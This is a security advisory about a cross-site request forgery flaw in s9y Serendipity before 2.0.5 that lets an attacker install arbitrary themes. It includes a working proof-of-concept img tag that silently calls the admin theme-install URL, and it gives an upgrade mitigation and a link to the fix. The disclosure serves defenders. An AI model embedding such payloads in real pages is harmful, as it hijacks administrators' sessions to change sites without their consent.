s9y Serendipity Cross Site Request Forgery

2017.04.12
Credit: Zhiyang Zeng
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

Details ====== Software: s9y Serendipity Version: <2.0.5 Homepage: https://docs.s9y.org/ ======= Description ================ Get type CSRF in Serendipity allows attacker installs any themes, no token here. POC: ======== include this in the page ,then attack will occur: <img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartlebya> Mitigations ======= update to Serendipity v2.1.x ======== FIX: ========== https://github.com/s9y/Serendipity/issues/452 Best regards, Zhiyang Zeng of Tencent security platform department


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top